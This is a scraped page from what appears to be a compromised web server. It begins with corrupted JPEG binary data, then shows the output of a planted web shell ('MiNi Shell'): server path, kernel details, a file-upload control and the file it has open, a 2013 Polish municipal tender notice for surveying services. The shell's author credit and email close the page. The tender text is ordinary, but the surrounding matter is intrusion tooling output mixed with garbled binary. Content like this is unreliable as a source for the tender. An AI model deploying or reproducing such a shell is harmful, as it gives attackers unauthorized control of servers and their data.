JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130124/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130124/34118-N-2013.html

<p class="kh_header"><b>Dąbrowa Górnicza: Wykonanie usług geodezyjno - kartograficznych dla nieruchomości
położonych w Dąbrowie Górniczej</b><br>
<b>Numer ogłoszenia: 34118 - 2013; data zamieszczenia: 24.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dąbrowa Górnicza , ul. Graniczna 21, 41-300 Dąbrowa Górnicza, woj. śląskie, tel. 32 2956700, faks 32 2625032, 2956700.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.dabrowa-gornicza.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie usług geodezyjno - kartograficznych dla nieruchomości
położonych w Dąbrowie Górniczej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Postępowanie o udzielenie zamówienia publicznego prowadzone w trybie przetargu nieograniczonego na podstawie ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz.U. z 2010r. Nr 113, poz. 759 z późniejszymi zmianami) o wartości zamówienia poniżej 200.000,00 EUR.
1. Przedmiot zamówienia obejmuje następujące usługi: 
a) Podział  geodezyjny  działki wraz z pomiarem aktualizacyjnym elementów terenu niezbędnych do podziału.
b) Trwała stabilizacja znaków granicznych po podziale.
c) Ustalenie granic działki w celu doprowadzenia do zgodności stanu prawnego nieruchomości ujawnionego 
w ewidencji gruntów i budynków ze stanem w księgach wieczystych ( w trybie  §  37 rozporządzenia Ministra Rozwoju Regionalnego i  Budownictwa  z  dnia  29 marca  2001r. Dz. U. 2001r. Nr 38, poz. 454).  
d) Wznowienie znaków granicznych ( art. 39 ustawy z dnia 17 maja 1989r. - Prawo geodezyjne i kartograficzne Dz. U. 2010 r. Nr 193, poz.1287 z późn. zm.) i  okazanie  granic działki na  gruncie. 
e) Rozgraniczenie  działki.
f) Wykonanie dokumentacji  geodezyjnej  do  celów  regulacji stanów  prawnych  (sporządzenie  wykazów  zmian danych ewidencyjnych   do założenia  ksiąg  wieczystych i doprowadzających   do    zgodności    zapisów    w   księgach  wieczystych z  ewidencją    gruntów   i    budynków  ). 
g) Aktualizacja użytków gruntowych działki.
h) Sporządzenie mapy do celów prawnych - mapa do ustalenia służebności.
i) Aktualizacja mapy zasadniczej.
j) Połączenie działek.
2. Warunki realizacji zamówienia:                                                          
2. 1.	Wykonanie poszczególnej usługi odnośnie pkt. 1. ppkt. a - j  przez  Wykonawcę nastąpi każdorazowo na podstawie odrębnego zlecenia pisemnego otrzymanego od  Zamawiającego, w siedzibie Zamawiającego,  tj. Urząd Miejski, ul. Graniczna 21, 41-300 Dąbrowa Górnicza.
2.2.	Wykonawca  uzgodni każdorazowo  z   Zamawiającym  pisemnie lub  telefonicznie  termin przekazania dokumentacji dotyczącej danego zlecenia, o której mowa  w  pkt. 1.  ppkt.   a - j.
2.3.	Przyjęcie   dokumentacji  nastąpi  na  podstawie   protokołu  zdawczo  -  odbiorczego  podpisanego  przez  Zamawiającego  oraz  przez  Wykonawcę i  tak  w  przypadku :

 a) podziału działki  - Wykonawca dostarczy projekt podziału danej działki z prawomocną decyzją  
o podziale zatwierdzającą ten projekt wraz z wykazem zmian gruntowych, który  będzie podstawą do ujawnienia podziału w księdze  wieczystej. 
W przypadku  podziału  działki  do  zwrotu   -   Wykonawca  dostarczy   projekt  podziału  wraz  z  wykazem  zmian  gruntowych, będący podstawą do ujawnienia podziału w księdze wieczystej,

b) trwałej  stabilizacji  znaków  granicznych  - Wykonawca  dostarczy  protokół z  czynności  trwałej stabilizacji znaków granicznych po podziale,

c) ustalenia granic działki w trybie § 37 rozporządzenia w sprawie ewidencji gruntów i budynków  -  Wykonawca   dostarczy  protokół  ustalenia  przebiegu  granic  działek  do celów ewidencji gruntów z klauzulą przyjęcia do zasobu geodezyjnego,

d) wznowienia  znaków  granicznych  i  okazania  granic  działki  - Wykonawca dostarczy   protokół  
z  czynności  wznowienia  znaków granicznych,

e)  rozgraniczenia  działki  -   Wykonawca    dostarczy    protokół   graniczny   z    klauzulą  przyjęcia  do  zasobu  geodezyjnego,

f) wykonania   dokumentacji   geodezyjnej    -    Wykonawca    dostarczy    wykaz    zmian  danych   ewidencyjnych.   Sporządzenie    wykazu   obejmuje   również   badanie   ksiąg   wieczystych, zbiorów dokumentów, ksiąg hipotecznych i dokumentów  własności przez   Wykonawcę,

g) aktualizacji   użytków   gruntowych   działki   -   Wykonawca   dostarczy   wykaz   zmian   danych  ewidencyjnych, który będzie podstawą do ujawnienia w księdze wieczystej, 

 h)  ustalenia   służebności   -   Wykonawca  dostarczy  mapę   (  w  5  egz.)  z   wkreślonym przebiegiem   służebności   i   obliczoną   jej   powierzchnią   (dotyczy  jednego  rodzaju służebności  niezależnie  od  ilości działek  przez  które  ma  ona  przebiegać),
           
 i) aktualizacji   mapy   zasadniczej     -   Wykonawca     dostarczy    kserokopię   fragmentu  zaktualizowanej  mapy  zasadniczej,  poświadczoną  przez  zasób geodezyjny,                           
          
j)  połączenia działek   -  Wykonawca   dostarczy   wykaz   zmian  danych   ewidencyjnych,    który  będzie podstawą  do  ujawnienia  w  księdze  wieczystej.
   
2.4.	Termin realizacji zlecenia odnośnie pkt. 1. ppkt. a - j zostanie uzgodniony każdorazowo pisemnie między   Zamawiającym,   a  Wykonawcą. 
2.5.	Wykonawca  zobowiązany   jest   stawić   się  w  siedzibie  Zamawiającego, tj. Urząd Miejski, ul. Graniczna 21, 41-300 Dąbrowa Górnicza,  na każde żądanie  telefoniczne  lub pisemne, co najmniej raz w tygodniu.   
2.6.	Wykonawca   nie   może   odmówić  odbioru   zlecenia.  Odmowa  odbioru   zlecenia   przez   Wykonawcę  może  skutkować  rozwiązaniem  umowy  z  przyczyn  leżących  wyłącznie po stronie Wykonawcy.
2.7.	Wykonawca zobowiązany jest do dostarczenia wykazów zmian danych ewidencyjnych  w 2 egzemplarzach. Jeżeli zaistnieje konieczność dostarczenia w większej ilości wykazów   - Zleceniodawca  uwzględni  to  w  danym  zleceniu.
2.8.	Okazanie  granic  nowopowstałych  działek  przez  Wykonawcę  nastąpi  na  każde  żądanie  Zamawiającego 
w terminie przez  niego określonym w okresie 1 roku od uprawomocnienia  się decyzji o podziale.
2.9.	Zamówienie wykonywane będzie wg potrzeb Zamawiającego do wysokości maksymalnej nominalnej wartości umowy.
2.10.	W przypadku gdyby decyzją organów Gminy lub z innych przyczyn niezależnych od Zamawiającego, nastąpiło obniżenie wysokości posiadanych środków, nie może to stanowić podstawy do rozwiązania umowy przez Wykonawcę z winy Zamawiającego ani żądania kary umownej czy też naprawienia szkody. 
3.Informacja o ilości zleconych usług w 2012 r. 
3.1.  Podział   geodezyjny    działki    wraz   z    pomiarem   aktualizacyjnym   elementów   terenu    
      niezbędnych   do   podziału :  
      ilość zleceń w 2012 roku  - 14
3.2.  Trwała  stabilizacja  znaków  granicznych  po  podziale :
      ilość zleceń w 2012 roku - 0
3.3.   Pomiar  granic  działki  w  celu doprowadzenia do zgodności stanu prawnego nieruchomości ujawnionego w ewidencji gruntów i budynków ze stanem w księgach wieczystych ( w trybie  §  37 rozporządzenia Ministra Rozwoju Regionalnego i  Budownictwa  z  dnia  29 marca  2001r. Dz. U. 2001r. Nr 38, poz. 454) :  
      ilość zleceń w 2012 roku - 1
3.4.  Wznowienie  znaków  granicznych  ( art.  39  ustawy  z  dnia  17 maja  1989r.  -    Prawo geodezyjne i kartograficzne Dz. U. 2010 r. Nr 193, poz.1287 z późn. zm.) i  okazanie  granic  działki na  gruncie : 
      ilość zleceń w 2012 roku - 0
3.5.  Rozgraniczenie  działki :
     ilość zleceń w 2012 roku - 7 
3.6. Wykonanie dokumentacji  geodezyjnej  do  celów  regulacji stanów  prawnych   (sporządzenie  wykazów   zmian danych ewidencyjnych   do założenia  ksiąg  wieczystych i doprowadzających   do    zgodności    zapisów    w     księgach   wieczystych z  ewidencją   gruntów   i    budynków  ) :
       ilość zleceń w 2012 roku - 22 
3.7.  Aktualizacja użytków gruntowych działki :
        ilość zleceń w 2012 roku - 7
3.8.   Wkreślenie   na   wyrysie   z   mapy  ewidencyjnej  przebiegu  służebności  i  obliczenie  jej  powierzchni :
       ilość zleceń w 2012 roku - 4 
3.9.  Aktualizacja mapy zasadniczej :
        ilość zleceń w 2012 roku - 5 
3.10. Połączenie działek :
        ilość zleceń w 2012 roku - 4 
Uwaga:
Wykonawcy nie służy roszczenie o wykonanie poszczególnych usług geodezyjno-kartograficznych w ilościach podanych w pkt. 3.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający  przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust.1 pkt. 6 Ustawy. Realizacja zamówień uzupełniających dot. będzie zakresu przewidzianego  opisem przedmiotu zamówienia i określonym kodami CPV. Wartość szacunkowa zamówień uzupełniających wyniesie nie więcej niż 50% wartości zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Zamawiający żąda złożenia oświadczenia z art. 22 ust. 1 ustawy i jego weryfikacja zostanie przeprowadzona wg formuły: spełnia- nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Zamawiający żąda złożenia oświadczenia z art. 22 ust. 1 ustawy i jego weryfikacja zostanie przeprowadzona wg formuły: spełnia- nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Zamawiający żąda złożenia oświadczenia z art. 22 ust. 1 ustawy i jego weryfikacja zostanie przeprowadzona wg formuły: spełnia- nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje osobą posiadającą uprawnienia geodezyjne do wykonywania prac geodezyjnych i kartograficznych na podstawie ustawy z dnia 17 maja  1989r. Prawo geodezyjne i kartograficzne (Dz. U. z 2010r. Nr 193, poz. 1287 z późn. zm.). Weryfikacja spełniania warunku zostanie przeprowadzona na podstawie przedstawionego wykazu i oświadczenia wg. formuły:spełnia nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Zamawiający żąda złożenia oświadczenia z art. 22 ust. 1 ustawy i jego weryfikacja zostanie przeprowadzona wg formuły: spełnia- nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty należy załączyć:
1. Formularz ofertowy - załącznik nr 1 do SIWZ (wskazana data podpisania);
2. pełnomocnictwo do reprezentowania Wykonawcy - jeżeli zostało ustanowione bądź do reprezentowania Wykonawców wspólnie ubiegających się o zamówienie przedłożone w formie oryginału lub kopii poświadczonej przez notariusza (dotyczy również spółki cywilnej);
3. zobowiązanie innych podmiotów, w szczególności pisemne, do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, wymagane w przypadku gdy Wykonawca polega na ich zasobach na zasadach określonych w art. 26 ust. 2b  Ustawy, wskazane jest aby obejmowało:  
a)	dane pozwalające na identyfikacje stron 
b)	zakres udostępniania (w zakresie wiedzy i doświadczenia, potencjału technicznego, osób zdolnych do wykonania zamówienia i sytuacji finansowej) oraz jego podstawa (np. umowa przedwstępna przyrzekająca zawarcie umowy o udostępnienie, umowy o podwykonawstwo, o współpracy, porozumienie o delegowaniu pracowników, umowa o świadczenie usług doradczych, know-how i inne umowy nienazwane) 
c)	cel i czas udostępnienia (obejmujący okres realizacji zamówienia).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje  możliwość dokonania istotnych zmian  postanowień zawartej  umowy 
w  stosunku do treści  oferty, na podstawie której   dokonano wyboru Wykonawcy, w zakresie:
1. zmiany terminu wykonania zamówienia w  przypadku wystąpienia siły wyższej. Siła wyższa oznacza wydarzenie nieprzewidywalne i poza kontrolą stron niniejszej umowy, występujące po podpisaniu umowy, 
a powodujące niemożliwość wywiązania się z umowy w jej obecnym brzmieniu, lub inne okoliczności niezależne od Zamawiającego, w tym takie, których Zamawiający przy zachowaniu należytej staranności nie był w stanie uniknąć lub przewidzieć; wystąpienia nietypowych dla klimatu polskiego warunków atmosferycznych uniemożliwiających prowadzenie zamówienia, np. gradobicia, trąby powietrzne, zjawiska niestandardowe 
w klimacie polskim,
2	w pozostałym zakresie zmiany do umowy mogą dotyczyć następujących okoliczności:
2.1.zmiany przepisów prawa istotnych dla postanowień zawartej umowy,
2.2. zmiany stawki podatku VAT tj.:
a)	w przypadku zwiększenia stawki podatku VAT ceny brutto za wykonanie poszczególnych usług geodezyjno - kartograficznych nie mogą być wyższe niż zadeklarowane w ofercie przez cały okres obowiązywania umowy,
b)	w przypadku zmniejszenia stawki podatku VAT ceny brutto za wykonanie poszczególnych usług geodezyjno - kartograficznych zostaną odpowiednio pomniejszone w odniesieniu do cen zadeklarowanych w ofercie. Maksymalna nominalna wartość umowy może ulec zmniejszeniu.
3. W przypadku wystąpienia okoliczności wymienionych wyżej strony poinformują się natychmiast 
o ich zaistnieniu.
4. Z okoliczności stanowiących podstawę zmiany do umowy zostanie sporządzony protokół podpisany przez obie strony.
5. Zmiana umowy powinna nastąpić w formie pisemnego aneksu podpisanego przez obie strony, pod rygorem nieważności takiego oświadczenia oraz powinna zawierać uzasadnienie faktyczne i prawne.
6. Pozostałe kwestie odnoszące się do umowy uregulowane są w załączniku nr 5 do SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.dabrowa-gornicza.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Dąbrowie Górniczej, ul. Graniczna 21, Wydział Gospodarki Nieruchomościami , pok. nr 230.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.02.2013 godzina 09:30, miejsce: Urząd  Miejski w Dąbrowie Górniczej, ul. Graniczna 21, parter, INFORMACJA, stanowisko nr 13.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamówienie nie jest finansowane ze środków Unii Europejskiej. 2.Zamawiający nie wymaga zabezpieczenia należytego wykonania umowy. 3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia
1.	Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia powinni spełniać warunki udziału 
w postępowaniu określone w pkt 8  SIWZ oraz złożyć dokumenty  i oświadczenia potwierdzające spełnianie tych warunków zgodnie z zapisami zawartymi w pkt 9 SIWZ.
2.	W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców, dokumenty i oświadczenia wymienione w pkt 9.2. SIWZ Wykonawcy składają odrębnie, natomiast dokument wymieniony w pkt 9.1.2 SIWZ Wykonawcy składają łącznie, przy czym oświadczenie wymienione w pkt 9.1.1. SIWZ oraz Formularz  ofertowy wymieniony w pkt 9.3.1. SIWZ - winny być podpisane przez uprawnionego przedstawiciela Wykonawców lub wspólnie (na jednym druku) przez wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia. 
3.	Ponadto ww. Wykonawcy ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowania i zawarcia umowy w sprawie zamówienia publicznego. 
4.	Wszelka korespondencja prowadzona będzie wyłącznie z  Pełnomocnikiem. 5. Dodatkowe informacje dotyczące terminu realizacji zamówienia: Termin wykonania zamówienia publicznego
Rozpoczęcie realizacji zamówienia: po podpisaniu umowy
Zakończenie realizacji zamówienia: 31.12.2013r. lub do wyczerpania maksymalnej nominalnej wartości umowy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com